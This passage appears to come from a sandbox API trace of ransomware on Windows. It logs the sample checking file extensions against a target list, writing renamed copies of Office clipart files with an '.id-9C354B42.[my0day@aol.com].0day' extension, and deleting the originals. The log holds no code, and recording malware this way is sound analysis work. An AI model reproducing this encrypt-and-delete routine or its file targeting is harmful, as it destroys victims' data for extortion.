(lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.658] lstrlenW (lpString=".doc") returned 4 [0270.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString=".docx") returned 5 [0270.659] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.659] lstrlenW (lpString=".pdf") returned 4 [0270.659] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString=".xls") returned 4 [0270.659] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.659] lstrlenW (lpString=".xlsx") returned 5 [0270.659] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.659] lstrlenW (lpString=".ppt") returned 4 [0270.659] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.659] lstrlenW (lpString=".zip") returned 4 [0270.659] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.659] lstrlenW (lpString=".rar") returned 4 [0270.659] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString=".bz2") returned 4 [0270.659] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString=".7z") returned 3 [0270.659] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.659] lstrlenW (lpString=".dbf") returned 4 [0270.659] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.659] lstrlenW (lpString=".1cd") returned 4 [0270.659] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.659] lstrlenW (lpString=".jpg") returned 4 [0270.659] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.659] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.659] lstrlenW (lpString=".doc") returned 4 [0270.659] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString=".docx") returned 5 [0270.660] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.660] lstrlenW (lpString=".pdf") returned 4 [0270.660] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString=".xls") returned 4 [0270.660] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.660] lstrlenW (lpString=".xlsx") returned 5 [0270.660] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.660] lstrlenW (lpString=".ppt") returned 4 [0270.660] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.660] lstrlenW (lpString=".zip") returned 4 [0270.660] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.660] lstrlenW (lpString=".rar") returned 4 [0270.660] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString=".bz2") returned 4 [0270.660] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString=".7z") returned 3 [0270.660] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.660] lstrlenW (lpString=".dbf") returned 4 [0270.660] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.660] lstrlenW (lpString=".1cd") returned 4 [0270.660] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 63 [0270.660] lstrlenW (lpString=".jpg") returned 4 [0270.660] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.660] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.660] lstrlenW (lpString="BS00135_.WMF") returned 12 [0270.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.661] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1044) returned 1 [0270.661] CloseHandle (hObject=0x380) returned 1 [0270.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 0x20 [0270.661] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.661] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.661] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.662] GetLastError () returned 0x0 [0270.662] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x414, lpOverlapped=0x0) returned 1 [0270.682] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x420, lpOverlapped=0x0) returned 1 [0270.683] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.683] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.683] SetEndOfFile (hFile=0x384) returned 1 [0270.683] CloseHandle (hObject=0x384) returned 1 [0270.683] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.683] SetEndOfFile (hFile=0x380) returned 1 [0270.688] CloseHandle (hObject=0x380) returned 1 [0270.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.710] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00135_.wmf")) returned 1 [0270.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.735] lstrlenW (lpString=".doc") returned 4 [0270.735] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.735] lstrlenW (lpString=".docx") returned 5 [0270.735] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.736] lstrlenW (lpString=".pdf") returned 4 [0270.736] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString=".xls") returned 4 [0270.736] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.736] lstrlenW (lpString=".xlsx") returned 5 [0270.736] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.736] lstrlenW (lpString=".ppt") returned 4 [0270.736] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.736] lstrlenW (lpString=".zip") returned 4 [0270.736] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.736] lstrlenW (lpString=".rar") returned 4 [0270.736] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString=".bz2") returned 4 [0270.736] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString=".7z") returned 3 [0270.736] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.736] lstrlenW (lpString=".dbf") returned 4 [0270.736] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.736] lstrlenW (lpString=".1cd") returned 4 [0270.736] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.736] lstrlenW (lpString=".jpg") returned 4 [0270.736] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.736] lstrlenW (lpString=".doc") returned 4 [0270.736] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.736] lstrlenW (lpString=".docx") returned 5 [0270.736] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.736] lstrlenW (lpString=".pdf") returned 4 [0270.736] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.737] lstrlenW (lpString=".xls") returned 4 [0270.737] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.737] lstrlenW (lpString=".xlsx") returned 5 [0270.737] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.737] lstrlenW (lpString=".ppt") returned 4 [0270.737] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.737] lstrlenW (lpString=".zip") returned 4 [0270.737] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.737] lstrlenW (lpString=".rar") returned 4 [0270.737] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.737] lstrlenW (lpString=".bz2") returned 4 [0270.737] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.737] lstrlenW (lpString=".7z") returned 3 [0270.737] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.737] lstrlenW (lpString=".dbf") returned 4 [0270.737] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.737] lstrlenW (lpString=".1cd") returned 4 [0270.737] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 63 [0270.737] lstrlenW (lpString=".jpg") returned 4 [0270.737] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.737] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.737] lstrlenW (lpString="BS00136_.WMF") returned 12 [0270.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.738] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=2166) returned 1 [0270.738] CloseHandle (hObject=0x380) returned 1 [0270.738] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 0x20 [0270.738] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0270.738] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.738] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.738] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0270.739] GetLastError () returned 0x0 [0270.739] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x876, lpOverlapped=0x0) returned 1 [0270.744] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x880, lpOverlapped=0x0) returned 1 [0270.745] ReadFile (in: hFile=0x380, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.745] WriteFile (in: hFile=0x384, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.745] SetEndOfFile (hFile=0x384) returned 1 [0270.747] CloseHandle (hObject=0x384) returned 1 [0270.747] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.747] SetEndOfFile (hFile=0x380) returned 1 [0270.750] CloseHandle (hObject=0x380) returned 1 [0270.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.766] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00136_.wmf")) returned 1 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.771] lstrlenW (lpString=".doc") returned 4 [0270.771] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.771] lstrlenW (lpString=".docx") returned 5 [0270.771] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.771] lstrlenW (lpString=".pdf") returned 4 [0270.771] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString=".xls") returned 4 [0270.772] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.772] lstrlenW (lpString=".xlsx") returned 5 [0270.772] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.772] lstrlenW (lpString=".ppt") returned 4 [0270.772] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.772] lstrlenW (lpString=".zip") returned 4 [0270.772] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.772] lstrlenW (lpString=".rar") returned 4 [0270.772] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString=".bz2") returned 4 [0270.772] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString=".7z") returned 3 [0270.772] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.772] lstrlenW (lpString=".dbf") returned 4 [0270.772] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.772] lstrlenW (lpString=".1cd") returned 4 [0270.772] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.772] lstrlenW (lpString=".jpg") returned 4 [0270.772] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.772] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.772] lstrlenW (lpString=".doc") returned 4 [0270.772] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString=".docx") returned 5 [0270.773] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.773] lstrlenW (lpString=".pdf") returned 4 [0270.773] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString=".xls") returned 4 [0270.773] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.773] lstrlenW (lpString=".xlsx") returned 5 [0270.773] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.773] lstrlenW (lpString=".ppt") returned 4 [0270.773] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.773] lstrlenW (lpString=".zip") returned 4 [0270.773] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0270.773] lstrlenW (lpString=".rar") returned 4 [0270.773] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString=".bz2") returned 4 [0270.773] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString=".7z") returned 3 [0270.773] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0270.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.773] lstrlenW (lpString=".dbf") returned 4 [0270.773] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.773] lstrlenW (lpString=".1cd") returned 4 [0270.773] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0270.773] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 63 [0270.773] lstrlenW (lpString=".jpg") returned 4 [0270.773] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0270.773] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0270.773] lstrlenW (lpString="BS00174_.WMF") returned 12 [0270.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0270.776] GetFileSizeEx (in: hFile=0x1fc, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=8366) returned 1 [0270.776] CloseHandle (hObject=0x1fc) returned 1 [0270.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 0x20 [0270.776] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0270.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0270.777] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.777] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0270.777] GetLastError () returned 0x0 [0270.777] ReadFile (in: hFile=0x1fc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x20ae, lpOverlapped=0x0) returned 1 [0270.780] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0x20b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0x20b0, lpOverlapped=0x0) returned 1 [0270.781] ReadFile (in: hFile=0x1fc, lpBuffer=0x3200020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0270.781] WriteFile (in: hFile=0x2cc, lpBuffer=0x3200020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3200020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0270.781] SetEndOfFile (hFile=0x2cc) returned 1 [0270.782] CloseHandle (hObject=0x2cc) returned 1 [0270.782] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0270.782] SetEndOfFile (hFile=0x1fc) returned 1 [0270.787] CloseHandle (hObject=0x1fc) returned 1 [0270.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0270.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00174_.wmf")) returned 1 [0270.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.788] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 63 [0270.788] lstrlenW (lpString=".doc") returned 4 [0270.788] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0270.788] lstrlenW (lpString=".docx") returned 5 [0270.788] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0270.788] lstrlenW (lpString=".pdf") returned 4 [0270.788] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0270.788] lstrlenW (lpString=".xls") returned 4 [0270.788] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0270.788] lstrlenW (lpString=".xlsx") returned 5 [0270.788] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0270.788] lstrlenW (lpString=".ppt") returned 4 [0270.788] lstrcmpiW (lpString1=".ppt", 